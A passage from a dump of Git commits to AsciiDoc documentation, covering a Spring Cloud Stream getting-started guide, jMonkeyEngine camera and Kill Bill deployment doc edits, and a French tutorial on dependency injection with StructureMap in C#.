follows:\n\n[%hardbreaks]\n[%hardbreaks]\n[%hardbreaks]\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/spring-initializr.png[align=\"center\"]\n\n[%hardbreaks]\n[%hardbreaks]\n\n. Click the *Generate Project* button.\n+\nDoing so downloads the zipped version of the generated project to your hard drive.\n. Unzip the file into the folder you want to use as your project directory.\n\nTIP: We encourage you to explore the many possibilities available in the Spring Initializr.\nIt lets you create many different kinds of Spring applications.\n\n[[spring-cloud-stream-preface-importing-project]]\n==== Importing the Project into Your IDE\n\nNow you can import the project into your IDE.\nKeep in mind that, depending on the IDE, you may need to follow a specific import procedure.\nFor example, depending on how the project was generated (Maven or Gradle), you may need to follow specific import procedure (for example, in Eclipse or STS, you need to use File -> Import -> Maven -> Existing Maven Project).\n\nOnce imported, the project must have no errors of any kind. Also, `src\/main\/java` should contain `com.example.loggingconsumer.LoggingConsumerApplication`.\n\nTechnically, at this point, you can run the application's main class.\nIt is already a valid Spring Boot application.\nHowever, it does not do anything, so we want to add some code.\n\n[[spring-cloud-stream-preface-adding-message-handler]]\n==== Adding a Message Handler, Building, and Running\n\nModify the `com.example.loggingconsumer.LoggingConsumerApplication` class to look as follows:\n\n[source, java]\n----\n@SpringBootApplication\npublic class LoggingConsumerApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(LoggingConsumerApplication.class, args);\n\t}\n\n\t@Bean\n\tpublic Consumer<Person> log() {\n\t return person -> {\n\t System.out.println(\"Received: \" + person);\n\t };\n\t}\n\n\tpublic static class Person {\n\t\tprivate String name;\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\t\tpublic String toString() {\n\t\t\treturn this.name;\n\t\t}\n\t}\n}\n----\n\nAs you can see from the preceding listing:\n\n* We are using functional programming model (see <<Spring Cloud Function support>>) to define a single message handler as `Consumer`.\n* We are relying on framework conventions to bind such handler to the input destination binding exposed by the binder.\n\nDoing so also lets you see one of the core features of the framework: It tries to automatically convert incoming message payloads to type `Person`.\n\nYou now have a fully functional Spring Cloud Stream application that does listens for messages.\nFrom here, for simplicity, we assume you selected RabbitMQ in <<spring-cloud-stream-preface-creating-sample-application,step one>>.\nAssuming you have RabbitMQ installed and running, you can start the application by running its `main` method in your IDE.\n\nYou should see following output:\n\n[source]\n----\n\t--- [ main] c.s.b.r.p.RabbitExchangeQueueProvisioner : declaring queue for inbound: input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg, bound to: input\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Attempting to connect to: [localhost:5672]\n\t--- [ main] o.s.a.r.c.CachingConnectionFactory : Created new connection: rabbitConnectionFactory#2a3a299:0\/SimpleConnection@66c83fc8. . .\n\t. . .\n\t--- [ main] o.s.i.a.i.AmqpInboundChannelAdapter : started inbound.input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg\n\t. . .\n\t--- [ main] c.e.l.LoggingConsumerApplication : Started LoggingConsumerApplication in 2.531 seconds (JVM running for 2.897)\n----\n\nGo to the RabbitMQ management console or any other RabbitMQ client and send a message to `input.anonymous.CbMIwdkJSBO1ZoPDOtHtCg`.\nThe `anonymous.CbMIwdkJSBO1ZoPDOtHtCg` part represents the group name and is generated, so it is bound to be different in your environment.\nFor something more predictable, you can use an explicit group name by setting `spring.cloud.stream.bindings.input.group=hello` (or whatever name you like).\n\nThe contents of the message should be a JSON representation of the `Person` class, as follows:\n\n\t{\"name\":\"Sam Spade\"}\n\nThen, in your console, you should see:\n\n`Received: Sam Spade`\n\nYou can also build and package your application into a boot jar (by using `.\/mvnw clean install`) and run the built JAR by using the `java -jar` command.\n\nNow you have a working (albeit very basic) Spring Cloud Stream application.\n\n== What's New in 3.0?\n\n\n[[spring-cloud-stream-preface-new-features]]\n=== New Features and Components\n\n- *Routing Function* - see <<Routing with functions>> for more details.\n- *Multiple bindings with functions* (multiple message handlers) - see <<Multiple functions in a single application>> for more details.\n- *Functions with multiple inputs\/outputs* (single function that can subscribe or target multiple destinations) - see <<Functions with multiple input and output arguments>> for more details.\n- *Native support for reactive programming* - since v3.0.0 we no longer distribute spring-cloud-stream-reactive modules and instead\nrelying on native reactive support provided by spring cloud function. For backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n\n\n[[spring-cloud-stream-preface-notable-enhancements]]\n=== Notable Enhancements\nTBD\n\n[[spring-cloud-stream-preface-notable-deprecations]]\n=== Notable Deprecations\n\n- Reactive module (`spring-cloud-stream-reactive`) is discontinued and no longer distributed in favor of native support via spring-cloud-function.\nFor backward\ncompatibility you can still bring `spring-cloud-stream-reactive` from previous versions.\n- We've deprecated `spring-cloud-stream-test-support` with MessageCollector in favor of a new test binder. See <<Testing>> for more details.\n- @StreamMessageConverter - deprecated as it is no longer required.\n- The reliance on the `original-content-type` has been removed after it's been deprecated in v2.0.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec875499f73f7e5f473ae7e61407539d5bf95ed3","subject":"Corrected moving the Camera topic.","message":"Corrected moving the Camera topic.\n\nCorrected moving the Camera topic not to use a deprecated method.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/remote-controlling_the_camera.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/remote-controlling_the_camera.adoc","new_contents":"= Remote-Controlling the Camera\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: camera, documentation, cinematics\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Positioning the Camera\n\nYou can steer the camera using <<jme3\/advanced\/cinematics#,Cinematics>>:\n\n. Create a Cinematic.\n. Create a CameraNode and bind the camera object to the Cinematic. Note that we also give the camera node a name in this step. \n+\n[source,java]\n----\nCameraNode camNode = cinematic.bindCamera(\"topView\", cam);\n----\n\n. Position the camera node in its start location.\n. Use activateCamera() to give the control of the camera to this node. You now see the scene from this camera's point of view. For example to see through the camera node named \u201ctopView, 6 seconds after the start of the cinematic, you'd write \n+\n[source,java]\n----\ncinematic.activateCamera(6, \"topView\");\n----\n\n\n\n=== Code Sample\n\n[source,java]\n----\n\nflyCam.setEnabled(false);\nCinematic cinematic = new Cinematic(rootNode, 20);\n\nCameraNode camNodeTop = cinematic.bindCamera(\"topView\", cam);\ncamNodeTop.setControlDir(ControlDirection.SpatialToCamera);\ncamNodeTop.getControl(0).setEnabled(false);\n\nCameraNode camNodeSide = cinematic.bindCamera(\"sideView\", cam);\ncamNodeSide.setControlDir(ControlDirection.CameraToSpatial);\ncamNodeSide.getControl(0).setEnabled(false);\n\n----\n\n\n== Moving the Camera\n\nIf desired, attach the camNode to a MotionEvent to let it travel along waypoints. This is demonstrated in the link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/animation\/TestCameraMotionPath.java[TestCameraMotionPath.java] example.\n","old_contents":"= Remote-Controlling the Camera\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: camera, documentation, cinematics\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Positioning the Camera\n\nYou can steer the camera using <<jme3\/advanced\/cinematics#,Cinematics>>:\n\n. Create a Cinematic.\n. Create a CameraNode and bind the camera object to the Cinematic. Note that we also give the camera node a name in this step. \n+\n[source,java]\n----\nCameraNode camNode = cinematic.bindCamera(\"topView\", cam);\n----\n\n. Position the camera node in its start location.\n. Use activateCamera() to give the control of the camera to this node. You now see the scene from this camera's point of view. For example to see through the camera node named \u201ctopView, 6 seconds after the start of the cinematic, you'd write \n+\n[source,java]\n----\ncinematic.activateCamera(6, \"topView\");\n----\n\n\n\n=== Code Sample\n\n[source,java]\n----\n\nflyCam.setEnabled(false);\nCinematic cinematic = new Cinematic(rootNode, 20);\n\nCameraNode camNodeTop = cinematic.bindCamera(\"topView\", cam);\ncamNodeTop.setControlDir(ControlDirection.SpatialToCamera);\ncamNodeTop.getControl(0).setEnabled(false);\n\nCameraNode camNodeSide = cinematic.bindCamera(\"sideView\", cam);\ncamNodeSide.setControlDir(ControlDirection.CameraToSpatial);\ncamNodeSide.getControl(0).setEnabled(false);\n\n----\n\n\n== Moving the Camera\n\nIf desired, attach the camNode to a MotionTrack to let it travel along waypoints. This is demonstrated in the link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/animation\/TestCameraMotionPath.java[TestCameraMotionPath.java] example.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"dd89c9e9ca9b5688fe7756525e8e6fd4b61785e9","subject":"Update deployment-overview.adoc","message":"Update deployment-overview.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/platform\/includes\/deployment-overview.adoc","new_file":"userguide\/platform\/includes\/deployment-overview.adoc","new_contents":"=== Overview\n\nKill Bill (whether used as a Billing System and\/or Payment System) is fundamentally a backend system, so the following considerations should apply:\n\n* Don't make the system visible to the outside world, instead you should have a front end system, or a reverse proxy in front of it; if you need to handle gateway notifications (e.g. IPN\/Internal Payment Notification), we developed an https:\/\/github.com\/killbill\/killbill-notifications-proxy[app] for that specific purpose\n* Always deploy at least 2 instances (for reliability purpose) in front of a load balancer\n* Setup your database with a master and a slave instances, and configure it to take regular snapshots\n* Aggregate your logs (for example using http:\/\/logstash.net\/[LogStash], https:\/\/www.graylog.org\/[GrayLog2], ...) and take a look at our https:\/\/github.com\/killbill\/killbill\/wiki\/Logback-recipes[Logback recipes]\n* Look at the all the existing Kill Bill JMX metrics (using VisualVM, jconsole, ...) and set some alerts (for instance by using the following https:\/\/github.com\/killbill\/nagios-jmx-plugin[script])\n* Configure your system properly, especially when it comes to the https:\/\/github.com\/killbill\/killbill\/wiki\/Kill-Bill-Bus-and-Notification-Queue-Configuration[settings of the bus and notification queue].\n\n\nWhen deploying Kill Bill, the following pieces will need to be deployed in addition to your OS, VM or container (Docker, ...):\n\n* A web container (Jetty, Tomcat, ...)\n* The killbill war\n* The plugins\n* The configuration files and system properties\n* The database along with the various schemas: the Kill Bill schema is available from our http:\/\/killbill.io\/downloads[download page] and each stateful plugin will\/should expose such a schema (for example, here is the https:\/\/github.com\/killbill\/killbill-adyen-plugin\/blob\/master\/src\/main\/resources\/ddl.sql[schema] for the Adyen plugin)\n\nIn order to ease the deployment, we created https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM], the Kill Bill Package Manager. KPM can fetch existing (signed) artifacts for the main killbill war and for each of the plugins, and deploy them at the right place. KPM can also deploy Tomcat.\n\nIn addition to KPM, we also provide https:\/\/registry.hub.docker.com\/u\/killbill\/killbill[Docker images]. Those images internally rely on KPM for fetching the various artifacts and install them at the right location on the image. The docker `run` command allows to override existing Kill Bill system properties.\n\nNote that one can decide to only use KPM for fetching and installing artifacts, and bypass docker to deploy on VMs or bare metal. Or alternatively one can use other tools, manual steps to fetch those artifacts from http:\/\/search.maven.org\/[Maven Central], or by using our convenient http:\/\/killbill.io\/downloads[download page].\n","old_contents":"=== Overview\n\nKill Bill (whether used as a Billing System or Payment System) is fundamentally a backend system and so the following consideration should apply:\n\n* Don't make the system visible to the outside world, you should have a front end system, or a reverse proxy in front of it; if you need to handle some IPN (Internal Payment Notification), we developed an https:\/\/github.com\/killbill\/killbill-notifications-proxy[app] for that specific purpose.\n* Always deploy at least 2 instances (for reliability purpose) in front of a load balancer.\n* Setup your database with a master and a slave instances, and configure it to take regular snapshots\n* Aggregate your logs (for example using http:\/\/logstash.net\/[LogStash], https:\/\/www.graylog.org\/[GrayLog2], ...) and take a look at our https:\/\/github.com\/killbill\/killbill\/wiki\/Logback-recipes[logback recipes]\n* Look at the all the existing Kill Bill JMX metrics (using VisualVM, jconsole, ...) and set some alerts (for instance by using the following https:\/\/github.com\/killbill\/nagios-jmx-plugin[script])\n* Configure your system properly, especially when it comes to the https:\/\/github.com\/killbill\/killbill\/wiki\/Kill-Bill-Bus-and-Notification-Queue-Configuration[settings of the bus and notification queue].\n\n\nWhen deploying Kill Bill, the following pieces will need to be deployed in addition to your OS, VM or container (Docker, ...):\n\n* A web container (Jetty, Tomcat, ...)\n* The killbill war\n* The plugins\n* The configuration files and system properties\n* The database along with the various schemas: the Kill Bill schema is available from our http:\/\/killbill.io\/downloads[download page] and each stateful plugin will\/should expose such a schema (for example, here is the https:\/\/github.com\/killbill\/killbill-adyen-plugin\/blob\/master\/src\/main\/resources\/ddl.sql[schema] for the Adyen plugin)\n\nIn order to ease the deployment, we created https:\/\/github.com\/killbill\/killbill-cloud\/tree\/master\/kpm[KPM], the Kill Bill Package Manager. KPM can fetch existing (signed) artifacts for the main killbill war and for each of the plugins, and deploy them at the right place. KPM can also deploy Tomcat.\n\nIn addition to KPM, we also provide https:\/\/registry.hub.docker.com\/u\/killbill\/killbill[Docker images]. Those images internally rely on KPM for fetching the various artifacts and install them at the right location on the image. The docker `run` command allows to override existing Kill Bill system properties.\n\nNote that one can decide to only use KPM for fetching and installing artifacts, and bypass docker to deploy on VMs or bare metal. Or alternatively one can use other tools, manual steps to fetch those artifacts from http:\/\/search.maven.org\/[Maven Central], or by using our convenient http:\/\/killbill.io\/downloads[download page].\n\nThe following sections below will give manual instructions on how to deploy on various Java containers.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4dbfdd0691ea72d685654674c7f63b1b2bb5025","subject":"Update 2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","message":"Update 2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","new_file":"_posts\/2015-12-02-Inverser-le-controle-avec-StructueMap.adoc","new_contents":"= Inverser le contr\u00f4le avec StructueMap !\n:hp-image: introduction-a-angular2.png\n:published_at: 2015-12-02\n:hp-tags: C#, IoC, StructureMap\n\n\nL'inversion de contr\u00f4le (aka *IoC*) est un pattron d'architecture permettant de casser les adh\u00e9renses entre les d\u00e9pendances. Ce d\u00e9couplage permet au d\u00e9pendances de haut niveau de ne plus reposer directement sur celle de bas niveau et de passer par une couche d'abstration. L'objectif est d'am\u00e9liorer la modularit\u00e9 des applications afin de faciliter les \u00e9tapes de maintenance et d'\u00e9volution.\n\n\n== Pourquoi ce pattern ?\n\nAvant de montrer la mise en place de l'inversion de contr\u00f4le il est pr\u00e9f\u00e9rable d'expliquer comment on en est arriv\u00e9 l\u00e0 !\n\nLe probl\u00e8me de d\u00e9part est assez simple en r\u00e9alit\u00e9. Si on a une application d\u00e9velopp\u00e9e en couche et que l'ont fait reposer chaqu'une d'elle sur une autre de plus bas niveau, que va-t-il se passer si par la suite on veut changer, modifier, supprimer la couche la plus basse ? Le probl\u00e8me est l\u00e0, il va falloir modifier la couche de plus haut niveau pour l'adapter en cons\u00e9quence. Il est d'ailleurs fort probable que cela d\u00e9clencher des modification en cascade sur toutes les couches haut niveau.\n\nAvec l'inversion de contr\u00f4le on va plut\u00f4t faire reposer chaque couche sur une abstraction afin de passer de \u00e7a :\n\n[Sch\u00e9ma]\n\nA \u00e7a :\n\n[Sch\u00e9ma]\n\nLa diff\u00e9rence est suptile mais importante. Dans le second sh\u00e9mas, changer les couches concr\u00eates de mon application n'entraine pas de probl\u00e8mes de structure, tout compilera. Mieux encore, le d\u00e9veloppement de l'application peut \u00eatre abstrait et n'avoir aucunes connaissances du fonctionnement bas niveau. Plus fort, je peux d\u00e9finir des abstractions utilis\u00e9s par les couches de bas niveau qui sont impl\u00e9ment\u00e9es en haut niveau. Un autre int\u00e9ressant, les test unitaires deviennent beaucoup plus simple et pertinent car les d\u00e9pendances ne rentre plus en compte dans l'\u00e9tape de validation.\n\nAu final en utilisant l'inversion de contr\u00f4le, votre application va devenir plus modulaire, souple, maintenable, \u00e9volutive et testable.\n\nNOTE: L'inversion de contr\u00f4le permet aussi de respecter un des principes majeurs de https:\/\/en.wikipedia.org\/wiki\/SOLID_(object-oriented_design)[SOLID] : l'inversion des d\u00e9pendances. Ce principe d\u00e9finit qu'il faut toujours d\u00e9pendre des abstractions et non des impl\u00e9mentations. Les principes SOLID sont consid\u00e9rer par beaucoup comme les _\"Best Pratices\"_ de la POO. Ils permettent d'avoir un d\u00e9veloppement \u00e9fficace et fiable.\n\nParmis les mani\u00e8res les plus courrante de mettre en place l'IoC, il existe :\n\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Factory_(object-oriented_programming)[Factory] qui permet de d\u00e9l\u00e9gu\u00e9 la cr\u00e9ation d'instance. Une approche rudimentaire mais qui a le m\u00e9rite d'\u00eatre simple dans sa mise en place.\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Service_locator_pattern[Service Locator] qui via l'utilisation d'un registrer permet de retourver des impl\u00e9mentations correspondant \u00e0 des contrats.\n* Le pattern https:\/\/en.wikipedia.org\/wiki\/Dependency_injection[Dependancy injection] qui permet de passer une d\u00e9pendance \u00e0 un object d\u00e9pendant.\n\nLa suite de l'article va se concentrer sur le troisi\u00e8me pattern, Depenceny Injection. Factory est un pattern trop simplice pour permettre de r\u00e9soudre les d\u00e9pendances \u00e0 lui seul et Service Locator est devenu au fil du temps un anti-pattern (notamment parce qu'il cr\u00e9e de l'ah\u00e9rence alors que c'est l'inverse que l'ont veut).\n\n\n== StructureMap en action : les bases !\n\nIl existe de nombreuse biblioth\u00e8que d\u00e9di\u00e9e \u00e0 l'IoC. Sinc\u00e9rement il n'y a pas de mauvais choix m\u00eame si j'ai tendance \u00e0 d\u00e9conseiller celle de Microsoft (https:\/\/github.com\/unitycontainer\/unity[Unity]) qui est \u00e0 la traine par rapport \u00e0 la concurrence. Pour ma part j'ai longtemps utilis\u00e9 Ninject pour son c\u00f4t\u00e9 _\"Simple & Straightforward\"_, tr\u00e8s \u00e9fficace en d\u00e9veloppement bien qu'un peu lent \u00e0 l'execution il faut l'admettre. Derni\u00e8rement j'ai d\u00e9cid\u00e9 de changer et je me suis mis sur StructureMap, un container historique (le premier en C#) qui embarque d'innombrables capacit\u00e9s pour un niveau de performance tr\u00e8s correct. C'est un bon compromis entre capacit\u00e9 et puissance et depuis la version 3 l'\u00e9quipe \u00e0 fait un gros travail pour se rapporcher de l'approche de Ninject. De plus il est en d\u00e9veloppement actif depuis presque 10 ans, il dispose d'une documentation riche et compl\u00e8te et est le premier \u00e0 disposer d'un support pour DNX avec la version 4. C'est cette version que l'on va utilis\u00e9 aujourd'hui !\n\nPour installer le package StructureMap il suffit d'ajouter le package Nuget via la commande :\n\n----\nInstall-Package StructureMap\n----\n\nLa premi\u00e8re classe qui va nous int\u00e9resser est Container. C'est l'\u00e9l\u00e9ment centrale de la librairie. Elle va nous permettre de d\u00e9finir les d\u00e9pendances \u00e0 r\u00e9soudres, leur fa\u00e7on d'\u00eatre r\u00e9solut et leur r\u00e9cup\u00e9ration.\nPour d\u00e9finir une d\u00e9pendance il nous faut un contract. Pour les besoins de l'article je vais en d\u00e9finir un :\n\n[source,csharp]\n----\npublic interface ILogger\n{\n\tvoid Information(string message);\n}\n----\n\nL'interface correspond \u00e0 un logger qui va tracer un message d'information. Son impl\u00e9mentation est la suivante :\n\n[source,csharp]\n----\npublic class ConsoleLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tConsole.WriteLine(message);\n\t}\n}\n----\n\nPour r\u00e9soudre cette d\u00e9pendance via le container il faut la d\u00e9finir. La classe poss\u00e8de un constructeur acceptant en param\u00e8tre une action qui expose un object de configuration. Cette object permet de d\u00e9finir les liaisons entre contrat et impl\u00e9mentation \u00e0 l'aide des m\u00e9thodes For<T> et Use<T> :\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n----\n\nCes deux m\u00e9thodes disposent d'une surcharge qui permet de passer en param\u00e8tre des object Type. Le r\u00e9sultat est le m\u00eame mais syntaxiquement c'est plus lourd \u00e0 lire. Il li\u00e9 le contrat \u00e0 une impl\u00e9mentation il existe aussi la m\u00e9thode Add<T>, ce code fonctionne donc aussi :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<Logger>();\n----\n\nNOTE: Il existe une diff\u00e9renciation tr\u00e8s nette entre les deux m\u00e9thode. Add<T> permet d'ajouter une impl\u00e9mentation alors que Use<T> d\u00e9finit l'implementation comme strictement \u00e0 utiliser. En cons\u00e9quence lors que vous utilisez Use<T> c'est toujours la derni\u00e8re liaison \u00e0 une impl\u00e9mentation qui l'emporte.\n\nParfois il est n\u00e9cessaire de d\u00e9finir comment le Container va cr\u00e9er l'instance, dans se cas il est possible d'utilise une surcharge de la m\u00e9thode Use qui accept en param\u00e8tre une Function qui a en param\u00e8tre le context du containeret qui retourne une instance correspondant au contrat :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Use(\"Logger instance creation\", (x) =>\n{\n\treturn new ConsoleLogger();\n});\n----\n\nLa d\u00e9pendance est \u00e0 pr\u00e9sent d\u00e9finit. Le code ne contient pas de logique de cr\u00e9ation des impl\u00e9mentations c'est donc l'instance de la class Container qui va donc les construire pour nous. Il est possible de les r\u00e9cup\u00e9rer en appelant la m\u00e9thode GetInstance<T>() :\n\n\n[source,csharp]\n----\nvar logger = container.GetInstance<ILogger>();\n----\n\nWARNING: Attention, la m\u00e9thode GetInstance<T> peut tr\u00e8s bien accepter des types impl\u00e9ment\u00e9s sans que cela ne pose de probl\u00e8mes. Cependant en faisant \u00e7a il y a une rupture avec le principe SOLID d'inversion de d\u00e9pendance. N'oubliez pas : Il faut d\u00e9pendre des abstractions, pas des impl\u00e9mentations.\n\nSi une d\u00e9pendance n'est pas d\u00e9finit et que l'ont souhaite la r\u00e9soudre, l'instance de Container l\u00e9ve une Exception de configuration. Il peut y avoir des cas o\u00f9 l'ont ne sait pas si une liaison est \u00e9tablie entre un contrat et une impl\u00e9mentation. Dans ce cas il vaut mieux utiliser la m\u00e9thode TryGetInstance<T> et tester si l'instance est retourn\u00e9e est null, c'est plus optimis\u00e9 que de traiter le cas avec un bloc try catch :\n\n[source,csharp]\n----\n\/\/Aucune impl\u00e9mentation de IDisposable n'est configur\u00e9s actuellement\nvar disposable = container.GetInstance<IDisposable>();\nConsole.WriteLine(disposable == null);\/\/print True\n----\n\nLa m\u00e9thode Add<T> permettant de d\u00e9finir plusieurs impl\u00e9mentation d'un m\u00eame contrat, il existe une m\u00e9thode GetAllInstances<T>() qui renvoie l'ensemble des impl\u00e9mentations correspondante. Si on rajoute une nouvelle impl\u00e9mentation de ILogger :\n\n[source,csharp]\n----\npublic class FileLogger : ILogger\n{\n\tpublic void Information(string message)\n\t{\n\t\tFile.WriteAllText(\"log.txt\", message);\n\t}\n}\n----\n\nEt qu'on l'ajoute les deux impl\u00e9mentations dans la configuration :\n\n[source,csharp]\n----\nconfiguration.For<ILogger>().Add<ConsoleLogger>();\nconfiguration.For<ILogger>().Add<FileLogger>();\n----\n\nL'appel \u00e0 la m\u00e9thode renverra une instance de IEnumerable<ILogger> :\n\n[source,csharp]\n----\nvar loggers = container.GetAllInstances<ILogger>();\nConsole.WriteLine(loggers.Count() == 2);\/\/print True\n----\n\nA ce stade vous avez les bases pour r\u00e9soudre des d\u00e9pendances. Cependant l'utilisation actuelle du Container correspond \u00e0 peu de chose pr\u00eat au pattern ServiceLocator. On aurait aussi pu faire une Factory pour g\u00e9rer la cr\u00e9ation d'instance. Il est donc temps de s'int\u00e9resser \u00e0 l'injection des d\u00e9pendances.\n\n== Injection\n\nPour injecter les d\u00e9pendances il nous faut une classse plus haut niveau qui repose sur le contrat \u00e9tablit dans ILogger. Pour continuer avec un cas simple prenons l'exemple d'un controlleur qui, lors de l'\u00e9xecution d'une action, trace une information via le logger. Si l'ont veut casser l'adh\u00e9rence il faut passer la d\u00e9pendance impl\u00e9mentant ILogger via le constructeur :\n\n[source,csharp]\n----\npublic class Controller\n{\n\tprivate ILogger _logger;\n\n\tpublic Controller(ILogger logger)\n\t{\n\t\t_logger = logger;\n\t}\n\n\tpublic void Action()\n\t{\n\t\tthis._logger.Information(\"Hello from action !\");\n\t}\n}\n----\n\nApr\u00e8s avoir configurer le Container pour li\u00e9 une des deux impl\u00e9mentations de ILogger, il est possible de r\u00e9cup\u00e9rer une instance de la classe Controller via la m\u00e9thode GetInstance<T>() :\n\n\n[source,csharp]\n----\nvar container = new Container(configuration =>\n{\n\tconfiguration.For<ILogger>().Use<ConsoleLogger>();\n});\n\nvar controller = container.GetInstance<Controller>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nJ'en vois d\u00e9j\u00e0 qui vont me r\u00e9pondre que j'ai mis un *Warning* plus haut concernant l'appel de GetInstance<T> sans utiliser une interface ! En r\u00e9alit\u00e9 dans ce cas les choses sont diff\u00e9rentes car Controller n'est pas une d\u00e9pandance mais un d\u00e9pendent. La r\u00e9solution est donc conforme au principe d'inversion de d\u00e9pendance. Cette mani\u00e8re de proc\u00e9der est une des plus couramment utilis\u00e9 dans le monde .Net (on l'a retrouve sous la forme de DependencyResolver dans les frameworks Microsoft).\n\nStructureMap offre aussi la possibilit\u00e9 d'injecter les d\u00e9pendances par inspection des propri\u00e9t\u00e9s plut\u00f4t que par le constructeur. C'est une alternative int\u00e9ressante et facile \u00e0 mettre en oeuvre. D\u00e9j\u00e0 cela permet de r\u00e9duire le code de la classe Controller \u00e0 :\n\n[source,csharp]\n----\npublic class Controller\n{\n\tpublic ILogger Logger { get; set; }\n\n\tpublic void Action()\n\t{\n\t\tthis.Logger.Information(\"Hello from action !\");\n\t}\n}\n----\n\nPar d\u00e9faut StructureMap ne r\u00e9soudera pas la d\u00e9pendance en l'\u00e9tat. Dans la configuration il faut, lors de la liaison entre un contrat et son impl\u00e9mentation, utiliser la m\u00e9thode Setter pour sp\u00e9cifier quelle type de d\u00e9pendance sous jacente va \u00eatre injecter : \n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>().Is<ConsoleLogger>();\n----\n\nLa m\u00e9thode Setter<T> dispose d'une surcharge qui permet d'injecter \u00e0 condition que le nom de la propri\u00e9t\u00e9 match avec celui pass\u00e9 en argument :\n\n[source,csharp]\n----\nconfiguration.For<IController>().Use<Controller>().Setter<ILogger>(\"Logger\").Is<ConsoleLogger>();\n----\n\nNOTE: Cette surcharge peut s'av\u00e9rer pratique, mais attention au renommage, on a vite fait d'oublier d'aller modifier la configuration du Container !\n\nUne fois mise en place il suffit de demander \u00e0 r\u00e9cup\u00e9rer une instance d'une d\u00e9pendance pour que celle ci soit automatiquement injecter avec celle sous-jacente :\n\n[source,csharp]\n----\n\/\/Avec Setter<T> il devient obligatoire de demander une instance correspondant \u00e0 un contrat.\n\/\/IController doit donc \u00eatre d\u00e9finit dans votre code pour que cela fonctionne\nvar controller = container.GetInstance<IController>();\ncontroller.Action();\/\/ print \"Hello from action !\"\n----\n\nCette premi\u00e8re fa\u00e7on de faire est certes \u00e9fficace mais imaginez faire cela pour toutes les d\u00e9pendances... ce n'est pas tr\u00e8s \u00e9l\u00e9gant. En plus il devient compliquer de r\u00e9soudre les d\u00e9pendances sur des instances d\u00e9pendant qu'on voudrait r\u00e9soudre avec le container. Il existe donc une m\u00e9thode plus \u00e9fficace pour mettre en place l'injection par propri\u00e9t\u00e9 : D\u00e9finir des conventions dans le registre des Policies du Container. Pour cela les d\u00e9veloppeurs de StructureMap on tout pr\u00e9vu, il existe une m\u00e9thode SetAllProperties qui attent en param\u00e8tre une action exposant une instance de la classe SetterConvention :\n\n[source,csharp]\n----\nconfiguration.Policies.SetAllProperties(convention => {\n\n});\n----\n\nPlusieurs possibil\u00e9s sont offertes pour d\u00e9finir une convention. La plus simple est celle qui d\u00e9finit une \u00e9xigence de type stricte :\n\n[source,csharp]\n----\nconvention.OfType<ILogger>();\n----\n\nUne convention par namespace peut \u00eatre \u00e9tablit, elle permet de d\u00e9clencher l'injection de la d\u00e9pendance uniquement sur les Type appartenant \u00e0 ce namespace. Deux possibilit\u00e9 de d\u00e9claration, Soit par nom :\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespace(\"MyNamespace\");\n----\n\nSoit en utilisant le namespace d'un type en particulier :\n\n[source,csharp]\n----\nconvention.WithAnyTypeFromNamespaceContainingType<ILogger>();\n----\n\nCes trois exemples de convention permettent de traiter pas mal de cas. La classe SetterConvention offre plusieurs autres possibilit\u00e9s pour customiser sa logique d'injection. Le mieux c'est de les essayer pour voir celle qui conviennent aux besoins.\n\nSans s'en rendre compte, en utilisant les conventions, une nouvelle capacit\u00e9s du Container a \u00e9t\u00e9 d\u00e9v\u00e9rouiller, le BuildUp ! Il est maintenant possible de se dispenser d'utiliser la m\u00e9thode GetInstance<T>() pour obtenir une instance d'un d\u00e9pendant avec ses d\u00e9pendances inject\u00e9es :\n\n[source,csharp]\n----\nvar controller = new Controller();\ncontainer.BuildUp(controller);\n----\n\nL'int\u00e9r\u00eat premier est qu'avec cette technique on va pouvoir injecter les d\u00e9pendances d'une instance dont la cr\u00e9ation est faite par un tier. Mine de rien cela ouvre pas mal de possibilit\u00e9 et permet de s'interfacer avec d'autre Framework ou Api qui poss\u00e8de leur propre 